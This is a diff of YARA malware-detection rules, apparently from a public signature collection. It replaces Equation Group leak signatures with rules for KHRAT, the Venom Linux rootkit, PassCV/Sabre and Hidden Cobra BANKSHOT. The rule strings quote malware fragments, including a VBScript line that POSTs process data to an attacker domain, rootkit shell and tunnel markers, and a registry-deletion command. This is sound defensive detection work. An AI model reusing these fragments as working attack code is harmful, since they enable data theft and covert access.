-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Rule derived from KHRAT scriptlet"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9def0814-c86a-5fae-abc2-4185596a74aa"
-		date = "2017-04-15"
+		id = "f72d68a3-0409-5401-b6a1-ca8f188d7409"
+		date = "2017-08-31"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2292-L2309"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_khrat.yar#L43-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ab50ad9e01c55b3f40e98e6e2cf77c1ad7d6d6ec81a56bbb2263a6e05912e272"
+		logic_hash = "cbbabd8e2f17827d96aeef4ea362f133cf3fcc31716c517b86a05a010ff62510"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5"
+		hash1 = "cdb9104636a6f7c6018fe99bc18fb8b542689a84c23c10e9ea13d5aa275fd40e"
 
 	strings:
-		$s1 = "BzWKJD+" fullword ascii
-		$op1 = { 44 24 6c 6c 88 5c 24 6d }
-		$op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 }
-		$op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e }
+		$x1 = "http.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\" " fullword ascii
+		$x2 = "Process=Process & Chr(32) & Chr(32) & Chr(32) & Obj.Description" fullword ascii
+		$s1 = "http.SetRequestHeader \"Content-Type\", \"application/json\" " fullword ascii
+		$s2 = "Dim http,WMI,Objs,Process" fullword ascii
+		$s3 = "Set Objs=WMI.InstancesOf(\"Win32_Process\")" fullword ascii
+		$s4 = "'WScript.Echo http.responseText " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x3f3c and filesize < 1KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_EXPA : FILE
+rule SIGNATURE_BASE_Venom_Rootkit : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Venom Linux Rootkit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "106efe9b-f70f-51cf-bbb2-b9bf61df1dd1"
-		date = "2017-04-15"
+		id = "fedc6fa9-7dfb-5e54-a7bf-9a16f96d6886"
+		date = "2017-01-12"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2311-L2327"
+		reference = "https://security.web.cern.ch/security/venom.shtml"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_venom_linux_rootkit.yar#L10-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2aa4ee5b128714cfa7f5d29f7ef110e1b18fb7bc21351444b2472ff74c4139d3"
+		logic_hash = "0b2211edc6737e9da3e43bec9ef823e80c6bd6463adbb10d6839e9914aed22ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8"
 
 	strings:
-		$x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii
-		$x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii
-		$x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii
-		$x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii
+		$s1 = "%%VENOM%CTRL%MODE%%" ascii fullword
+		$s2 = "%%VENOM%OK%OK%%" ascii fullword
+		$s3 = "%%VENOM%WIN%WN%%" ascii fullword
+		$s4 = "%%VENOM%AUTHENTICATE%%" ascii fullword
+		$s5 = ". entering interactive shell" ascii fullword
+		$s6 = ". processing ltun request" ascii fullword
+		$s7 = ". processing rtun request" ascii fullword
+		$s8 = ". processing get request" ascii fullword
+		$s9 = ". processing put request" ascii fullword
+		$s10 = "venom by mouzone" ascii fullword
+		$s11 = "justCANTbeSTOPPED" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
+		filesize < 4000KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Target : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "608e5244-2d3f-573c-a0de-44637051f4ba"
-		date = "2017-04-15"
+		id = "99a26daa-c563-5b23-89b9-965d8ce7229d"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2329-L2345"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L10-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3eedb6abb09989784a7dc5e721f9901e936f2c0241967b48858e5e5897b9f24a"
+		logic_hash = "dfa356b4dff12c3de467c74763fc4d233db9ff5bc3e9ac9f052d331fa47a4ded"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f"
+		hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a"
+		hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55"
 
 	strings:
-		$s1 = "Win32_Process" fullword ascii
-		$s2 = "\\\\%ls\\root\\cimv2" fullword wide
-		$op1 = { 83 7b 18 01 75 12 83 63 }
+		$x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii
+		$x2 = "bin\\oSaberSvc.pdb" ascii
+		$s1 = "cmd.exe /c MD " fullword ascii
+		$s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide
+		$s3 = "CloudRun.exe" fullword wide
+		$s4 = "SaberSvcB.exe" fullword wide
+		$s5 = "SaberSvc.exe" fullword wide
+		$s6 = "SaberSvcW.exe" fullword wide
+		$s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide
+		$s8 = "Internet Connect Failed!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) and 5 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_DS_Parselogs : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_Signing_Cert : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1906c0fc-3fbc-5995-8789-f1c02e574672"
-		date = "2017-04-15"
+		id = "2b2d1313-6454-5e3f-9b58-5b1a26739ba8"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2347-L2362"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L36-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4c35476b512378d1e3c7e7e3e9dae16adb0d4de4ecab143d034110836c11d0d"
-		score = 75
+		logic_hash = "ead1de262858960a13b375713183f775bc275fbf4beba4c0839cef2baa5e9f00"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956"
+		hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e"
 
 	strings:
-		$x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide
-		$x2 = "* Capture header not found at start of buffer" fullword wide
-		$x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide
+		$s1 = "WOODTALE TECHNOLOGY INC" ascii
+		$s2 = "Flyingbird Technology Limited" ascii
+		$s3 = "Neoact Co., Ltd." ascii
+		$s4 = "AmazGame Age Internet Technology Co., Ltd" ascii
+		$s5 = "EMG Technology Limited" ascii
+		$s6 = "Zemi Interactive Co., Ltd" ascii
+		$s7 = "337 Technology Limited" ascii
+		$s8 = "Runewaker Entertainment0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Oracle_Implant : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6ff4cd21-1060-5901-842e-c04bde4f16ec"
-		date = "2017-04-15"
+		id = "dd9eb5f6-9faa-584d-b3b5-6dcfdc3f359c"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2364-L2379"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L59-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "568a5d103527e6fd99bbac8d49a2d667f464fd16d5bf276f98c88c39e129b58b"
+		logic_hash = "f640f1dc60c6714195dcdb9a0bb4fb0c34e0a62673bca00c7f49f7b73c3f9b0a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e"
+		hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4"
+		hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78"
+		hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b"
+		hash4 = "0c7b952c64db7add5b8b50b1199fc7d82e9b6ac07193d9ec30e5b8d353b1f6d2"
 
 	strings:
-		$op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 }
-		$op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 }
-		$op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d }
+		$x1 = "ncProxyXll" fullword ascii
+		$s1 = "Uniscribe.dll" fullword ascii
+		$s2 = "WS2_32.dll" ascii
+		$s3 = "ProxyDll" fullword ascii
+		$s4 = "JDNSAPI.dll" fullword ascii
+		$s5 = "x64.dat" fullword ascii
+		$s6 = "LSpyb2" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_Excalibur_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "182a2488-ac3f-5dc6-aa61-d6d267574d10"
-		date = "2017-04-15"
+		id = "eadad36c-49c8-50e1-8334-813d2e760fe9"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2381-L2395"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L84-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9ae3e0c30c9dbee311d4e5576b1a447ac57f8b1786dc5753246ad3c08ccecb85"
+		logic_hash = "ffbd971368420460573c4ecc68261088ffacf91ab9ae72405b41393b04aa2b46"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2"
+		hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb"
+		hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70"
 
 	strings:
-		$s1 = "\\\\.\\%ls" fullword ascii
-		$s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii
+		$x1 = "F:\\Excalibur\\Excalibur\\" ascii
+		$x2 = "Excalibur\\bin\\Shell.pdb" ascii
+		$x3 = "SaberSvc.exe" wide
+		$s1 = "BBB.exe" fullword wide
+		$s2 = "AAA.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of ( $x* ) or all of ( $s* ) ) or 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setresourcename : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc261147-3b52-57c3-9729-2645a0999a99"
-		date = "2017-04-15"
+		id = "03e5efc0-6076-501f-a600-b3d9008a8711"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2397-L2413"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L107-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e26aac30e06da14060a955761d08e6f543db2f2747be2959b0090f60e6eb52a5"
+		logic_hash = "1032f41688e7cb3fe0be33b143c1af43ee705737a70af3b336ba8504ffe169a9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e"
+		hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1"
 
 	strings:
-		$x1 = "Updates the name of the dll or executable in the resource file" fullword ascii
-		$x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii
-		$x3 = "2 = [appinit.dll] level4 dll" fullword ascii
-		$x4 = "1 = [spcss32.exe] level3 exe" fullword ascii
+		$x1 = "NXKILL" fullword wide
+		$s1 = "2OLE32.DLL" fullword ascii
+		$s2 = "localspn.dll" fullword wide
+		$s3 = "!This is a Win32 program." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Drivers_Implant : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "727a0a8c-0019-53e9-9632-c610299305fc"
-		date = "2017-04-15"
+		id = "f182064d-3a91-5a61-aa0f-2ce491a60126"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2415-L2431"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L126-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "45190a317f3d293dbc3015873080d1253bfb3298008f5dea69ab1a5780a70721"
+		logic_hash = "c445e745ef520438fa7c4ddcae2657b57c80d798640fdd7c85eabf535f158911"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab"
+		hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f"
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$s2 = "hZwLoadDriver" fullword ascii
-		$op1 = { b0 01 e8 58 04 00 00 c3 33 }
+		$s1 = "QWNjZXB0On" fullword ascii
+		$s2 = "VXNlci1BZ2VudDogT" fullword ascii
+		$s3 = "dGFzay5kbnME3luLmN" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Shares_Target : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Tool_Ntscan : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "51245be4-6d24-57e4-8c92-c8c1ae5e3cf9"
-		date = "2017-04-15"
+		id = "6ec3371a-2a1c-53d1-b650-d28728db1b40"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2433-L2449"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "11a1af97d720286a7fadf8b056f8f7add70acb041a828441166f5c74bc7a819d"
+		logic_hash = "f2b41c1e6db8c9288663cccbf5659484ed415b403068cc566b31aa044bf0de9e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb"
+		hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665"
 
 	strings:
-		$s1 = "Select * from Win32_Share" fullword ascii
-		$s2 = "slocalhost" fullword wide
-		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
-		$s4 = "\\\\%ls\\%ls" fullword ascii
+		$x1 = "NTscan.EXE" fullword wide
+		$x2 = "NTscan Microsoft " fullword wide
+		$s1 = "admin$" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntfltmgr : FILE
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_5 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "402b14f5-4a7a-58fb-8f4a-0a29d6d34440"
-		date = "2017-04-15"
+		id = "ce8d1b9e-7750-5796-a048-20bfd48c6aee"
+		date = "2016-10-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2451-L2475"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L161-L182"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9f280baf785f54218cbf47f65419cfe23c687e58021f36b5d116904d2cec9a9b"
+		logic_hash = "30508c6561a2bb908945e9092da1d5cf2257b8b183effcea25a1ba15567f3d20"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124"
-		hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
-		hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43"
+		hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5"
 
 	strings:
-		$s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii
-		$s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii
-		$op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 }
-		$op2 = { ff 15 0b 34 00 00 eb 92 }
-		$op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae }
-		$op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 }
-		$op5 = { 8a 40 01 00 c7 47 70 }
-		$op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 }
-		$op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 }
+		$x1 = "ncircTMPg" fullword ascii
+		$x2 = "~SHELL#" fullword ascii
+		$x3 = "N.adobe.xm" fullword ascii
+		$s1 = "NEL32.DLL" fullword ascii
+		$s2 = "BitLocker.exe" fullword wide
+		$s3 = "|xtplhd" fullword ascii
+		$s4 = "SERVICECORE" fullword wide
+		$s5 = "SHARECONTROL" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH : FILE
+rule SIGNATURE_BASE_Hiddencobra_BANKSHOT_Gen : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Hidden Cobra BANKSHOT trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2477-L2492"
+		id = "fbf9dd32-cb9a-51f2-bd03-0387fbf44baa"
+		date = "2017-12-26"
+		modified = "2022-06-10"
+		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_bankshot.yar#L11-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "273e38e287b1597753f653c0ed8300936581a1b767029d3f0ba757de589bcd5a"
+		logic_hash = "db4d396736ab42942f1a11a819419410e388b011e8992ad187c2f484d637c99c"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f"
+		hash1 = "89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486"
+		hash2 = "8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247"
+		hash3 = "b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24"
+		hash4 = "daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75"
+		hash5 = "ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699"
+		hash6 = "d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff"
+		hash7 = "ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9"
+		hash8 = "3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6"
+		hash9 = "6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca"
 
 	strings:
-		$op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 }
-		$op1 = { 45 33 c9 49 8d 7f 2c 41 ba }
-		$op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 }
+		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword wide
+		$s2 = "rHTTP/1.1 200 Connection established" fullword wide
+		$s3 = "Proxy-Connection: keep-alive" fullword wide
+		$s4 = "\\msncf.dat" wide
+		$s5 = "msvcru32.bat" fullword ascii
+		$s6 = "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"%s\" /f" fullword ascii
+		$s7 = "MXINFO.DLL" fullword ascii
+		$s8 = "usrvc32.bat" fullword ascii
+		$s9 = "ping -n 1 127.0.0.1" fullword ascii
+		$s10 = "%sd.e%sc \"%s > %s 2>&1\"" ascii fullword
+		$s11 = "DWS*.tmp" ascii fullword
+		$s12 = "CS*.tmp" fullword wide
+		$s13 = "WM*.tmp" fullword wide
+		$x1 = "CgpaipIddwspwe32Hnaehsdi" fullword ascii
+		$x2 = "RpiPmtiCdopIsgpao" fullword ascii
+		$x3 = "RpiLtnodlhOtgpcidgyA" fullword ascii
+		$x4 = "LatiQdgHtnrwpDbupci" fullword ascii
+		$x6 = "\\system32\\msncf.dat" ascii
+		$x7 = "GprthipgHpgktcpCigwSanowpgA" fullword ascii
+		$a1 = "live.dropbox.com" fullword ascii
+		$a2 = "tatadocomo.yahoo.com" fullword ascii
+		$a3 = "widgets.twimg.com" fullword ascii
+		$a4 = "history.paypal.com" fullword ascii
